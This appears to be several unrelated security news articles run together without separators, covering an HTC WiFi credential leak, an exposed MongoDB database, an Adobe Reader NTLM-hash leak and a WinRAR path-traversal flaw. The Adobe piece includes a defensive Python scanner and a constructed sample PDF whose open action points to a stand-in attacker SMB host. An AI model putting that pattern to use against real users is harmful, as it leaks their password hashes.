Recently HTC acknowledged a vulnerability that can expose a user’s WiFi credentials, including the WiFi SSID and security passwords, to a malicious app running on some of its Android phones. The vulnerability was discovered by the security architects Chris Hessing and Bret Jordan, and is also published on the US-CERT website.

The vulnerability is due to an issue in certain Android models that allows an Android application with basic permissions (particularly ‘android.permission.ACCESS_WIFI_STATE’) to access all the stored WiFi credentials, including the respective SSIDs, user names and security passwords, belonging to various WPA/WPA2-PSK/802.1x based WiFi networks. On top of this, if an application also has the internet permission (‘android.permission.INTERNET’), it can transfer the accessed list of WiFi credentials to a remote server.

Exposing the list of WiFi credentials to an unintended party or person without the user’s knowledge can have serious security implications if the former has malicious intent. Some of these include:

Unauthorized access to private WiFi networks: Having gained the list of WiFi credentials from a user’s mobile device, the simplest thing for a hacker to do is to intrude into the corresponding private WiFi networks. The private network can be a home, campus or corporate WiFi network. The intrusion will allow a hacker to carry out a host of malicious activities on the network, such as installing malware on the network and scanning the network for confidential information or security vulnerabilities. Many corporates are adopting BYOD (Bring Your Own Device) initiatives nowadays, giving employees’ personal mobile devices access to the corporate WiFi. But since personal devices lack strict corporate controls, vulnerabilities similar to this recently discovered one can be a serious security threat for corporates adopting BYOD schemes. All WiFi networks requiring a security passphrase (in the case of WPA/WPA2-PSK security) or a combination of username and password (in the case of WPA/WPA2-802.1x) can suffer intrusion through exploitation of the discovered vulnerability. In contrast, WiFi networks requiring digital certificates or SIM-based authentication (in the case of WPA/WPA2-802.1x) are potentially safe from intrusion attacks launched via exploitation of the vulnerability.

Eavesdropping/Session hijacking on secured WiFi networks: Losing the WiFi credentials of a WPA/WPA2-PSK WiFi network can be more damaging than losing those of a WPA/WPA2-802.1x WiFi network, because in the former all the WiFi clients of a particular network share a common security passphrase. Therefore, an attacker having gained the SSID and security passphrase through the discovered vulnerability can sniff all the private encrypted WiFi communications happening over the associated WiFi network (using easily available hardware and software) and decode them afterward, or simultaneously, using the available credentials. Since the decoded traffic can reveal browser cookies, a hacker can also potentially hijack an authorized user’s web session. WPA/WPA2-PSK networks are popular among home and SOHO users, and therefore the user’s online traffic, even though encrypted, is susceptible to eavesdropping and session hijacking once a hacker has illegally gained the necessary credentials by exploiting the discovered vulnerability.

Man-In-the-Middle attack on WiFi users: Losing the WiFi credentials also enables a hacker to launch a man-in-the-middle attack on connected users of the affected WiFi network. The attack can potentially hurt the users through leakage of confidential data or malware implantation. Although WPA/WPA2-PSK networks are more susceptible to man-in-the-middle attacks, by exploiting the Hole196 vulnerability one can carry out this attack on WPA/WPA2-802.1x networks too.

Potential loss of personal information: People often use WiFi hotspots for broadband access on their devices while they work, travel or visit various public places. Many WiFi hotspots include the identity of their location in their SSID, so losing the WiFi credentials, including the SSID details, can also reveal a lot of information about a user to third parties, such as company name, places travelled to, etc. These personal details can motivate crimes such as stalking.

Looking at the damage that losing the list of WiFi credentials can cause, the vulnerability discovery is very important from the user’s security perspective, considering the growing usage of Android-based mobile devices and WiFi networks across the world. Moreover, considering the open nature of the Android market, malware exploiting the vulnerability can easily be developed and targeted at the users of affected devices, posing a greater security concern for them. A fix for the vulnerability is already available, and HTC has said that many phones have already received the fix through regular updates, but some users may need to manually update their phones.

Hopefully, being aware of the list of potential damages of the discovered vulnerability, mobile device users will be a bit more careful when selecting and installing an app on their device.

A security researcher has identified an unsecured server that was leaking detailed personal information on nearly half a million Indian citizens… thanks to yet another MongoDB database instance that a company left unprotected on the Internet, accessible to anyone without a password.

In a report shared with The Hacker News, Bob Diachenko disclosed that two days ago he found a 4.1 GB-sized highly sensitive database online, named “GNCTD,” containing information collected on 458,388 individuals located in Delhi, including their Aadhaar numbers and voter ID numbers.

Though it’s not clear if the exposed database is linked to the Government of National Capital Territory of Delhi (GNCTD), Diachenko found that the database contains references and email addresses with “” domain for users registered with “senior supervisor,” and “super admin” designations.

Based upon the information available on Transerve Technologies’ website, it is a Goa-based company that specializes in smart city solutions and advanced data collection technology.

The company’s data collector, precision mapping and location intelligence tools help businesses across various sectors and government agencies use geolocation data to make smart decisions.

The leaked database contains the following tables:

  • EB Users (14,861 records)
  • Households (102,863 records)
  • Individuals (458,388 records)
  • Registered Users (399 records)
  • Users (2,983 records)

According to Diachenko’s analysis, one of the database tables, containing registered users, includes email addresses, hashed passwords and usernames for administrator access.


“The most detailed information contained in ‘Individuals’ collection which was basically a pretty detailed portrait of a person, incl. health conditions, education, etc.,” Diachenko said.

“Households collection contained fields such as ‘name’, ‘house no’, ‘floor number’, ‘geolocation’, area details, ’email_ID’ of a supervisor, ‘is the household cooperating for survey’ field, ‘type of latrine’, ‘functional water meter’, ‘ration card number’, ‘internet facility available’ and even ‘informan name’ field.”

“It remains unknown just how long database was online and if anyone else accessed it,” Diachenko said.

When Transerve didn’t respond to the responsible disclosure sent via email, Diachenko contacted Indian CERT, which further coordinated with the company to take its exposed database offline immediately.

“The danger of having an exposed MongoDB or similar NoSQL databases is a huge risk. We have previously reported that the lack of authentication allowed the installation of malware or ransomware on thousands of MongoDB servers,” Diachenko said.

“The public configuration allows the possibility of cybercriminals to manage the whole system with full administrative privileges. Once the malware is in place, criminals could remotely access the server resources and even launch a code execution to steal or completely destroy any saved data the server contains.”

This isn’t the first time MongoDB instances have been found exposed to the Internet. In recent years, we have published several reports in which unprotected database servers exposed billions of records.

None of this is MongoDB’s fault, as administrators are always advised to follow the security checklist provided by the MongoDB maintainers.

Adobe has issued yet another patch for a critical vulnerability in its Acrobat Reader – a week after the original fix.

A week after Adobe fixed a critical zero-day vulnerability in its Acrobat Reader, the company issued another patch after a researcher dug up a way to bypass the original fix.

This previous vulnerability (CVE-2019-7089) was fixed in Adobe’s regularly scheduled security update last week. But Adobe said that its recent patch for the sensitive data leakage vulnerability, which could enable information disclosure, had a hole.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS,” said Adobe in its unscheduled Thursday update. “These updates address a reported bypass to the fix for CVE-2019-7089 first introduced in 2019.010.20091, 2017.011.30120 and 2015.006.30475 and released on February 12, 2019.”

The zero-day vulnerability in Adobe Reader, disclosed by Alex Infuhr from cure53 in a Jan. 26 post, enabled bad actors to steal victims’ hashed password values, known as “NTLM hashes.”

The vulnerability allowed a PDF document to automatically send a server message block (SMB) request to an attacker’s server as soon as the document is opened. SMB protocols enable an application or user of an application to access files on a remote server. Embedded in these SMB requests are NTLM hashes (NTLM is short for NT LAN Manager).

The critical vulnerability was temporarily patched last week by 0patch before Adobe issued its official patch. “This vulnerability… allows a remote attacker to steal user’s NTLM hash included in the SMB request,” said Mitja Kolsek with 0patch in a Monday post. “It also allows a document to ‘phone home’, i.e., to let the sender know that the user has viewed the document. Obviously, neither of these is desirable.”
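A document that reaches out to an external SMB host the moment it is opened leaves a trace in the file itself: a reference to a remote host in one of its action objects. The scanner below is an added example, not code from cure53, 0patch or Adobe; it flags UNC paths and `file://`/`smb://` URLs inside uncompressed PDF objects and reports the action type they sit in. It assumes plain-text object dictionaries (objects inside compressed object streams must be inflated first) and does not reproduce the actual CVE-2019-7089 trigger; the sample PDF text and the host name `attacker.example` are constructed.

```python
import re

# Split the file into "N G obj ... endobj" units so a hit can be attributed to an object.
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.DOTALL)
ACTION_RE = re.compile(rb"/S\s*/(\w+)")
# UNC path: two or more backslashes (PDF string escaping doubles them), host, backslash.
UNC_RE = re.compile(rb"\\{2,}([A-Za-z0-9._-]+)\\+")
URL_RE = re.compile(rb"(?:file|smb)://([A-Za-z0-9._-]+)/", re.IGNORECASE)

# Constructed sample: a harmless https link in object 5 and a remote-file action
# in object 4 whose target is a UNC path on an external host (placeholder name).
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /GoToR /F (\\\\attacker.example\\share\\doc.pdf) >> endobj
5 0 obj << /S /URI /URI (https://example.org/report) >> endobj
%%EOF"""


def find_remote_smb_refs(pdf_bytes: bytes) -> list[dict]:
    """Return one finding per object that references a remote host via UNC/file/smb."""
    findings = []
    for num, body in OBJ_RE.findall(pdf_bytes):
        hosts = {m.decode() for m in UNC_RE.findall(body)}
        hosts |= {m.decode() for m in URL_RE.findall(body)}
        if not hosts:
            continue
        action = ACTION_RE.search(body)
        findings.append({
            "object": int(num),
            "action": action.group(1).decode() if action else None,
            "hosts": sorted(hosts),
        })
    return findings


if __name__ == "__main__":
    for f in find_remote_smb_refs(SAMPLE_PDF):
        print(f"object {f['object']}: action={f['action']} hosts={f['hosts']}")
```

A hit is a reason to quarantine the document for review; the network-side control that blunts this whole class regardless of the file is to block outbound TCP 445 at the perimeter.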

And while Adobe patched the flaw last week, a bypass for the fix, tracked by CVE-2019-7815, exists and can ultimately lead to information disclosure: “Successful exploitation could lead to sensitive information disclosure in the context of the current user,” according to Adobe’s update.

Impacted are versions of Adobe Acrobat and Reader for Windows and macOS – specifically, Acrobat DC and Acrobat Reader DC continuous, versions 2019.010.20091 and earlier; Acrobat 2017 and Acrobat Reader 2017 Classic, versions 2017.011.30120 and earlier; and Acrobat DC and Acrobat Reader DC Classic 2015, versions 2015.006.30475 and earlier.

The update received a “priority 2” rating, meaning that it resolves vulnerabilities in a product that has historically been at elevated risk – but that there are currently no known exploits.

Infuhr, who discovered the proof of concept for the original vulnerability, was also credited with reporting the issue.

Users of the popular file-compression tool are urged to immediately update after a serious code-execution flaw was found in WinRAR. 

Popular Windows data compression tool WinRAR has patched a serious 19-year-old security flaw that was discovered on its platform, potentially impacting 500 million users.

The path-traversal vulnerability, which WinRAR fixed in January, could allow bad actors to remotely execute malicious code on victims’ machines – simply by persuading them to open a file, researchers with Check Point Software said on Wednesday.

“We found a logical bug using the WinAFL fuzzer and exploited it in WinRAR to gain full control over a victim’s computer,” said Nadav Grossman with Check Point in the analysis. “The exploit works by just extracting an archive, and puts over 500 million users at risk. This vulnerability has existed for over 19 years(!) and forced WinRAR to completely drop support for the vulnerable format.”

WinRAR is a popular file-archiving utility for Windows, which can create and allow viewing of archives in Roshal Archive Compressed (RAR) or ZIP file formats, and unpack numerous archive file formats.

Researchers specifically found a path-traversal vulnerability in unacev2.dll, a third-party dynamic link library in WinRAR used for parsing ACE (a data compression archive file format) archives.

A path-traversal attack allows attackers to access directories that they should not be accessing, such as config files or other files containing server data that is not intended for the public.

When taking a closer look at unacev2.dll, researchers found that “it’s an old dated dll compiled in 2006 without a protection mechanism. In the end, it turned out that we didn’t even need to bypass them,” said Grossman.

Due to the lack of protections in and support for unacev2.dll, researchers were able to simply rename an ACE file to give it a RAR extension. When opened by WinRAR, the fake ACE file containing a malicious program is extracted to the system’s startup folder, so the program would automatically begin running when the system starts.

Ultimately, if a bad actor used spear-phishing tactics to send an unknowing victim a disguised ACE file, and the victim opened the file in WinRAR, the file would automatically extract in the victim’s startup folder and malware could then be quickly planted on the system.

The PoC makes use of a chain of vulnerabilities (CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253).

After researchers informed WinRAR of the issue, the vulnerability was patched in a new version of the software on Jan. 28, 5.70 beta 1.

A WinRAR spokesperson told Threatpost: “We have removed support for the ACE file format from WinRAR in the new Beta version 5.70.”

In an update on its website, WinRAR said: “WinRAR used this third-party library to unpack ACE archives. unacev2.dll had not been updated since 2005 and we do not have access to its source code. So we decided to drop ACE archive format support to protect security of WinRAR users.”

File-compression flaws have piqued the interest of exploit vendors such as Zerodium, which earlier last year offered $10,000 for zero-day vulnerabilities in WinRAR and other compression platforms.